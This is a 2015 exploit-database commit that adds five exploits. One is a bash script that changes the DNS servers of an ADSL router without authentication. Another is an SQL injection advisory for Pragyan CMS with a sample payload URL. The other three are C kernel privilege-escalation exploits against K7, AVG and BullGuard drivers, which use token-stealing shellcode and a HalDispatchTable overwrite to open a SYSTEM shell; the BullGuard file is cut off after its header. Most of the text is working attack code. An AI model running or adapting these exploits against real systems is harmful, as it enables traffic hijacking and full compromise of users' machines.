From d1471a4059a357e1834dc62d0918c9010697dd68 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 6 Feb 2015 08:37:15 +0000 Subject: [PATCH] Update: 2015-02-06 5 new exploits --- files.csv | 5 + platforms/hardware/remote/35995.sh | 90 ++++++++ platforms/php/webapps/35991.txt | 74 +++++++ platforms/windows/local/35992.c | 335 ++++++++++++++++++++++++++++ platforms/windows/local/35993.c | 344 +++++++++++++++++++++++++++++ platforms/windows/local/35994.c | 340 ++++++++++++++++++++++++++++ 6 files changed, 1188 insertions(+) create mode 100755 platforms/hardware/remote/35995.sh create mode 100755 platforms/php/webapps/35991.txt create mode 100755 platforms/windows/local/35992.c create mode 100755 platforms/windows/local/35993.c create mode 100755 platforms/windows/local/35994.c diff --git a/files.csv b/files.csv index ae31ae422..614648fc8 100755 --- a/files.csv +++ b/files.csv @@ -32435,3 +32435,8 @@ id,file,description,date,author,platform,type,port 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35989,platforms/php/webapps/35989.txt,"MBoard 1.3 'url' Parameter URI Redirection Vulnerability",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0 +35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80 +35992,platforms/windows/local/35992.c,"K7 Computing Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 +35993,platforms/windows/local/35993.c,"AVG Internet Security 2015 Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 +35994,platforms/windows/local/35994.c,"BullGuard Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 +35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0 diff --git a/platforms/hardware/remote/35995.sh b/platforms/hardware/remote/35995.sh new file mode 100755 index 000000000..0f64ea370 --- /dev/null +++ b/platforms/hardware/remote/35995.sh @@ -0,0 +1,90 @@ +#!/bin/bash +# +# Shuttle Tech ADSL Modem-Router 915 WM +# Unauthenticated Remote DNS Change Exploit +# +# Copyright 2015 (c) Todor Donev +# http://www.ethical-hacker.org/ +# +# Description: +# The vulnerability exist in the web interface, which is +# accessible without authentication. +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Warning: +# My first public report on such a serious +# vulnerability was ignored by the manufacturers +# and were committed serious criminal deeds of +# cybercriminals in Brasil. This vulnerability +# could affect millions of users worldwide. +# http://www.exploit-db.com/exploits/16275/ +# http://securelist.com/blog/research/57776/the-tale-of-one-thousand-and-one-dsl-modems/ +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# + +if [[ $# -gt 3 || $# -lt 2 ]]; then + echo " Shuttle Tech ADSL Modem-Router 915 WM" + echo " Unauthenticated Remote DNS Change Exploit" + echo " ================================================================" + echo " Usage: $0 " + echo " Example: $0 133.7.133.7 8.8.8.8" + echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4" + echo "" + echo " Copyright 2015 (c) Todor Donev " + echo " http://www.ethical-hacker.org/" + exit; +fi +GET=`which GET 2>/dev/null` +if [ $? -ne 0 ]; then + echo " Error : libwww-perl not found =/" + exit; +fi + GET "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1 + diff --git a/platforms/php/webapps/35991.txt b/platforms/php/webapps/35991.txt new file mode 100755 index 000000000..8faa7fb09 --- /dev/null +++ b/platforms/php/webapps/35991.txt @@ -0,0 +1,74 @@ +Advisory: SQL injection vulnerability in Pragyan CMS v.3.0 +Advisory ID: SROEADV-2015-11 +Author: Steffen Rösemann +Affected Software: Pragyan CMS v.3 +Vendor URL: https://github.com/delta/pragyan, http://delta.nitt.edu/ +Vendor Status: vendor did not respond after initial communication +CVE-ID: - + +========================== +Vulnerability Description: +========================== + +Pragyan CMS v. 3 suffers from a SQL injection vulnerability that can be +abused even by unauthenticated attackers. + +================== +Technical Details: +================== + +The user-profile of registered users of Pragyan CMS v.3 is vulnerable to +SQL injection attacks. A user-profile can be found in the following +location of a common Pragyan CMS installation: + +http://{TARGET}/user:1 + +Exploit-Example: + +http:// +{TARGET}/user:1%27+and+1=2+union+select+database%28%29,version%28%29,3+--+ + + + +========= +Solution: +========= + +Vendor notified, did not respond after initial communication. + +If you use Pragyan CMS v.3, please locate the file userprofile.lib.php and +use my patch (see [5], usage at your own risk!). + + + + +==================== +Disclosure Timeline: +==================== +18-Jan-2015 – found the vulnerability +19-Jan-2015 - informed the developers (see [3]) +19-Jan-2015 – release date of this security advisory [without technical +details] +19-Jan-2015 - forked the project to keep it available/researchable in its +current state for other researchers [4] +03-Feb-2015 - release date of this security advisory +03-Feb-2015 - provided a patch for vulnerability (see [5]) +03-Feb-2015 - send to FullDisclosure + + + +======== +Credits: +======== + +Vulnerability found and advisory written by Steffen Rösemann. + +=========== +References: +=========== + +[1] http://delta.nitt.edu/ / https://github.com/delta/pragyan +[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-11.html +[3] https://github.com/delta/pragyan/issues/206 +[4] https://github.com/sroesemann/pragyan +[5] http://pastebin.com/ip2gGYuS \ No newline at end of file diff --git a/platforms/windows/local/35992.c b/platforms/windows/local/35992.c new file mode 100755 index 000000000..4f352bebc --- /dev/null +++ b/platforms/windows/local/35992.c @@ -0,0 +1,335 @@ +?/* + +Exploit Title - K7 Computing Multiple Products Arbitrary Write Privilege Escalation +Date - 04th February 2015 +Discovered by - Parvez Anwar (@parvezghh) +Vendor Homepage - http://www.k7computing.co.uk/ +Tested Version - 14.2.0.240 +Driver Version - 12.8.0.104 - K7Sentry.sys +Tested on OS - 32bit Windows XP SP3 +OSVDB - http://www.osvdb.org/show/osvdb/113007 +CVE ID - CVE-2014-9643 +Vendor fix url - none +Fixed version - 14.2.0.253 +Fixed driver ver - 12.8.0.118 + +*/ + + +#include +#include + +#define INBUFSIZE 4 +#define BUFSIZE 4096 + + +typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { + PVOID Unknown1; + PVOID Unknown2; + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT Index; + USHORT NameLength; + USHORT LoadCount; + USHORT PathLength; + CHAR ImageName[256]; +} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; + +typedef struct _SYSTEM_MODULE_INFORMATION { + ULONG Count; + SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + +typedef enum _SYSTEM_INFORMATION_CLASS { + SystemModuleInformation = 11, + SystemHandleInformation = 16 +} SYSTEM_INFORMATION_CLASS; + +typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( + SYSTEM_INFORMATION_CLASS SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength); + +typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( + DWORD ProfileSource, + PULONG Interval); + +typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN OUT PULONG RegionSize, + IN ULONG AllocationType, + IN ULONG Protect); + +typedef void (*FUNCTPTR)(); + + + +// Windows XP SP3 + +#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct +#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct +#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct +#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct + + +BYTE token_steal_xp[] = +{ + 0x52, // push edx Save edx on the stack + 0x53, // push ebx Save ebx on the stack + 0x33,0xc0, // xor eax, eax eax = 0 + 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD + 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS + 0x8b,0xc8, // mov ecx, eax + 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN + 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks + 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks + 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) + 0x75,0xe8, // jne ---- + 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX + 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX + 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS + 0x5b, // pop ebx Restores ebx + 0x5a, // pop edx Restores edx + 0xc2,0x08 // ret 8 Away from the kernel +}; + + + +DWORD HalDispatchTableAddress() +{ + _NtQuerySystemInformation NtQuerySystemInformation; + PSYSTEM_MODULE_INFORMATION pModuleInfo; + DWORD HalDispatchTable; + CHAR kFullName[256]; + PVOID kBase = NULL; + LPSTR kName; + HMODULE Kernel; + FUNCTPTR Hal; + ULONG len; + NTSTATUS status; + + + NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); + + if (!NtQuerySystemInformation) + { + printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); + return -1; + } + + status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); + + if (!status) + { + printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); + return -1; + } + + pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); + + if(pModuleInfo == NULL) + { + printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); + return -1; + } + + status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); + + memset(kFullName, 0x00, sizeof(kFullName)); + strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); + kBase = pModuleInfo->Module[0].Base; + + printf("[i] Kernel base name %s\n", kFullName); + kName = strrchr(kFullName, '\\'); + + Kernel = LoadLibraryA(++kName); + + if(Kernel == NULL) + { + printf("[-] Failed to load kernel base\n\n"); + return -1; + } + + Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); + + if(Hal == NULL) + { + printf("[-] Failed to find HalDispatchTable\n\n"); + return -1; + } + + printf("[i] HalDispatchTable address 0x%08x\n", Hal); + printf("[i] Kernel handle 0x%08x\n", Kernel); + printf("[i] Kernel base address 0x%08x\n", kBase); + + HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); + + printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); + + if(!HalDispatchTable) + { + printf("[-] Failed to calculate HalDispatchTable\n\n"); + return -1; + } + + return HalDispatchTable; +} + + + +int GetWindowsVersion() +{ + int v = 0; + DWORD version = 0, minVersion = 0, majVersion = 0; + + version = GetVersion(); + + minVersion = (DWORD)(HIBYTE(LOWORD(version))); + majVersion = (DWORD)(LOBYTE(LOWORD(version))); + + if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; + if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; + if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; + + return v; +} + + +void spawnShell() +{ + STARTUPINFOA si; + PROCESS_INFORMATION pi; + + + ZeroMemory(&pi, sizeof(pi)); + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + + si.cb = sizeof(si); + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_SHOWNORMAL; + + if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) + { + printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); + return; + } + + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); +} + + +int main(int argc, char *argv[]) +{ + + _NtAllocateVirtualMemory NtAllocateVirtualMemory; + _NtQueryIntervalProfile NtQueryIntervalProfile; + BYTE *inbuffer; + NTSTATUS allocstatus; + LPVOID base_addr = (LPVOID)0x00000001; + DWORD size = BUFSIZE; + DWORD written; + int rwresult; + unsigned char buffer[BUFSIZE]; + HANDLE hDevice; + DWORD dwRetBytes = 0; + DWORD HalDispatchTableTarget; + ULONG time = 0; + unsigned char devhandle[MAX_PATH]; + + + printf("-------------------------------------------------------------------------------\n"); + printf(" K7 Computing Multiple Products (K7Sentry.sys) Arbitrary Write EoP Exploit \n"); + printf(" Tested on Windows XP SP3 (32bit) \n"); + printf("-------------------------------------------------------------------------------\n\n"); + + if (GetWindowsVersion() == 1) + { + printf("[i] Running Windows XP\n"); + } + + if (GetWindowsVersion() == 0) + { + printf("[i] Exploit not supported on this OS\n\n"); + return -1; + } + + sprintf(devhandle, "\\\\.\\%s", "K7Sentry"); + + NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); + + if (!NtQueryIntervalProfile) + { + printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); + return -1; + } + + NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"); + + if (!NtAllocateVirtualMemory) + { + printf("[-] Unable to resolve NtAllocateVirtualMemory\n"); + return -1; + } + + allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + if (allocstatus) + { + printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus); + printf("Error : %d\n", GetLastError()); + return -1; + } + printf("[+] NtAllocateVirtualMemory allocated memory at 0x%.8x\n", base_addr); + + memset(buffer, 0x90, BUFSIZE); + memcpy(buffer+0x00000005, token_steal_xp, sizeof(token_steal_xp)); + + printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); + + rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written); + + if (rwresult == 0) + { + printf("[-] An error occured while mapping writing memory: %d\n", GetLastError()); + return -1; + } + printf("[+] WriteProcessMemory %d bytes written\n", written); + + hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if (hDevice == INVALID_HANDLE_VALUE) + { + printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); + return -1; + } + else + { + printf("[+] Open %s device successful\n", devhandle); + } + + inbuffer = VirtualAlloc(NULL, INBUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + memset(inbuffer, 0x41, INBUFSIZE); + + HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); + printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); + + printf("[~] Press any key to send Exploit . . .\n"); + getch(); + + DeviceIoControl(hDevice, 0x95002570, inbuffer, INBUFSIZE, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); + + printf("[+] Buffer sent\n"); + CloseHandle(hDevice); + + printf("[+] Spawning SYSTEM Shell\n"); + NtQueryIntervalProfile(2, &time); + spawnShell(); + + return 0; +} diff --git a/platforms/windows/local/35993.c b/platforms/windows/local/35993.c new file mode 100755 index 000000000..ff3b3ffa5 --- /dev/null +++ b/platforms/windows/local/35993.c @@ -0,0 +1,344 @@ +?/* + +Exploit Title - AVG Internet Security 2015 Arbitrary Write Privilege Escalation +Date - 04th February 2015 +Discovered by - Parvez Anwar (@parvezghh) +Vendor Homepage - http://www.avg.com/ +Tested Version - 2015.0.5315 +Driver Version - 15.0.0.5204 - avgtdix.sys +Tested on OS - 32bit Windows XP SP3 +OSVDB - http://www.osvdb.org/show/osvdb/113824 +CVE ID - CVE-2014-9632 +Vendor fix url - http://www.avg.com/eu-en/avg-release-notes +Fixed Version - 2015.0.5557 +Fixed driver ver - 15.0.0.5553 + + + +Note +---- +Overwritten HAL dispatch table after exploit + +kd> dps nt!HalDispatchTable l c +8054ccb8 00000003 +8054ccbc 00340000 +8054ccc0 8678d9a0 +8054ccc4 0a050002 +8054ccc8 6e66744e +8054cccc 001c0707 +8054ccd0 00000180 +8054ccd4 000001a4 +8054ccd8 867d6690 +8054ccdc 86706480 +8054cce0 00000000 +8054cce4 804e42d1 nt!ObpTraceDepth+0x19 + +10 pointers get overwritten. Since input buffer is in our control and pointers +are static in XP I've triggered the overwrite again restoring the pointers. + +*/ + + +#include +#include + +#define BUFSIZE 4096 + + +typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { + PVOID Unknown1; + PVOID Unknown2; + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT Index; + USHORT NameLength; + USHORT LoadCount; + USHORT PathLength; + CHAR ImageName[256]; +} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; + +typedef struct _SYSTEM_MODULE_INFORMATION { + ULONG Count; + SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + +typedef enum _SYSTEM_INFORMATION_CLASS { + SystemModuleInformation = 11, + SystemHandleInformation = 16 +} SYSTEM_INFORMATION_CLASS; + +typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( + SYSTEM_INFORMATION_CLASS SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength); + +typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( + DWORD ProfileSource, + PULONG Interval); + +typedef void (*FUNCTPTR)(); + + + +// Windows XP SP3 + +#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct +#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct +#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct +#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct + + +BYTE token_steal_xp[] = +{ + 0x52, // push edx Save edx on the stack + 0x53, // push ebx Save ebx on the stack + 0x33,0xc0, // xor eax, eax eax = 0 + 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD + 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS + 0x8b,0xc8, // mov ecx, eax + 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN + 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks + 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks + 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) + 0x75,0xe8, // jne ---- + 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX + 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX + 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS + 0x5b, // pop ebx Restores ebx + 0x5a, // pop edx Restores edx + 0xc2,0x08 // ret 8 Away from the kernel +}; + + + +BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable +"\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation +"\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation +"\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots +"\x00\x00\x00\x00" // 8054ccc8 00000000 +"\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR +"\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters +"\xe5\x4a\x5c\x80" // 8054ccd4 805c4ae5 nt!IoReadPartitionTable +"\x7b\x3f\x61\x80" // 8054ccd8 80613f7b nt!IoSetPartitionInformation +"\xef\x41\x61\x80" // 8054ccdc 806141ef nt!IoWritePartitionTable +"\x57\xd1\x52\x80"; // 8054cce0 8052d157 nt!CcHasInactiveViews + + + +DWORD HalDispatchTableAddress() +{ + _NtQuerySystemInformation NtQuerySystemInformation; + PSYSTEM_MODULE_INFORMATION pModuleInfo; + DWORD HalDispatchTable; + CHAR kFullName[256]; + PVOID kBase = NULL; + LPSTR kName; + HMODULE Kernel; + FUNCTPTR Hal; + ULONG len; + NTSTATUS status; + + + NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); + + if (!NtQuerySystemInformation) + { + printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); + return -1; + } + + status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); + + if (!status) + { + printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); + return -1; + } + + pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); + + if(pModuleInfo == NULL) + { + printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); + return -1; + } + + status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); + + memset(kFullName, 0x00, sizeof(kFullName)); + strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); + kBase = pModuleInfo->Module[0].Base; + + printf("[i] Kernel base name %s\n", kFullName); + kName = strrchr(kFullName, '\\'); + + Kernel = LoadLibraryA(++kName); + + if(Kernel == NULL) + { + printf("[-] Failed to load kernel base\n\n"); + return -1; + } + + Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); + + if(Hal == NULL) + { + printf("[-] Failed to find HalDispatchTable\n\n"); + return -1; + } + + printf("[i] HalDispatchTable address 0x%08x\n", Hal); + printf("[i] Kernel handle 0x%08x\n", Kernel); + printf("[i] Kernel base address 0x%08x\n", kBase); + + HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); + + printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); + + if(!HalDispatchTable) + { + printf("[-] Failed to calculate HalDispatchTable\n\n"); + return -1; + } + + return HalDispatchTable; +} + + +int GetWindowsVersion() +{ + int v = 0; + DWORD version = 0, minVersion = 0, majVersion = 0; + + version = GetVersion(); + + minVersion = (DWORD)(HIBYTE(LOWORD(version))); + majVersion = (DWORD)(LOBYTE(LOWORD(version))); + + if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; + if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; + if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; + + return v; +} + + +void spawnShell() +{ + STARTUPINFOA si; + PROCESS_INFORMATION pi; + + + ZeroMemory(&pi, sizeof(pi)); + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + + si.cb = sizeof(si); + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_SHOWNORMAL; + + if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) + { + printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); + return; + } + + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); +} + + + +int main(int argc, char *argv[]) +{ + + _NtQueryIntervalProfile NtQueryIntervalProfile; + LPVOID input[1] = {0}; + LPVOID addrtoshell; + HANDLE hDevice; + DWORD dwRetBytes = 0; + DWORD HalDispatchTableTarget; + ULONG time = 0; + unsigned char devhandle[MAX_PATH]; + + + printf("-------------------------------------------------------------------------------\n"); + printf(" AVG Internet Security 2015 (avgtdix.sys) Arbitrary Write EoP Exploit \n"); + printf(" Tested on Windows XP SP3 (32bit) \n"); + printf("-------------------------------------------------------------------------------\n\n"); + + if (GetWindowsVersion() == 1) + { + printf("[i] Running Windows XP\n"); + } + + if (GetWindowsVersion() == 0) + { + printf("[i] Exploit not supported on this OS\n\n"); + return -1; + } + + sprintf(devhandle, "\\\\.\\%s", "avgtdi"); + + NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); + + if (!NtQueryIntervalProfile) + { + printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); + return -1; + } + + addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + if(addrtoshell == NULL) + { + printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); + return -1; + } + printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); + + memset(addrtoshell, 0x90, BUFSIZE); + memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); + printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); + + hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if (hDevice == INVALID_HANDLE_VALUE) + { + printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); + return -1; + } + else + { + printf("[+] Open %s device successful\n", devhandle); + } + + HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); + printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); + + input[0] = addrtoshell; // input buffer contents gets written to our output buffer address + + printf("[+] Input buffer contents %08x\n", input[0]); + + printf("[~] Press any key to send Exploit . . .\n"); + getch(); + + DeviceIoControl(hDevice, 0x830020f8, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); + + printf("[+] Buffer sent\n"); + + printf("[+] Spawning SYSTEM Shell\n"); + NtQueryIntervalProfile(2, &time); + spawnShell(); + + printf("[+] Restoring Hal dispatch table pointers\n\n"); + + DeviceIoControl(hDevice, 0x830020f8, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); + + CloseHandle(hDevice); + + return 0; +} diff --git a/platforms/windows/local/35994.c b/platforms/windows/local/35994.c new file mode 100755 index 000000000..e01044f8b --- /dev/null +++ b/platforms/windows/local/35994.c @@ -0,0 +1,340 @@ +?/* + +Exploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation +Date - 04th February 2015 +Discovered by - Parvez Anwar (@parvezghh) +Vendor Homepage - http://www.bullguard.com/ +Tested Version - 14.1.285.4 +Driver Version - 1.0.0.6 - BdAgent.sys +Tested on OS - 32bit Windows XP SP3 +OSVDB - http://www.osvdb.org/show/osvdb/114478 +CVE ID - CVE-2014-9642 +Vendor fix url - http://www.bullguard.com/about/release-notes.aspx +Fixed Version - 15.0.288.1 +Fixed driver ver - 1.0.0.7 + + + +Note +---- +Overwritten HAL dispatch table after exploit + +kd> dps nt!HalDispatchTable l c +8054ccb8 00000003 +8054ccbc 00340000 +8054ccc0 00010000 +8054ccc4 0a060002 +8054ccc8 ee657645 +8054cccc 00000001 +8054ccd0 00000001 +8054ccd4 867c1bf0 +8054ccd8 80613f7b nt!IoSetPartitionInformation +8054ccdc 806141ef nt!IoWritePartitionTable +8054cce0 8052d157 nt!CcHasInactiveViews +8054cce4 804e42d1 nt!ObpTraceDepth+0x19 + +7 pointers get overwritten. Since input buffer is in our control and pointers +are static in XP I've triggered the overwrite again restoring the pointers. + +*/ + + 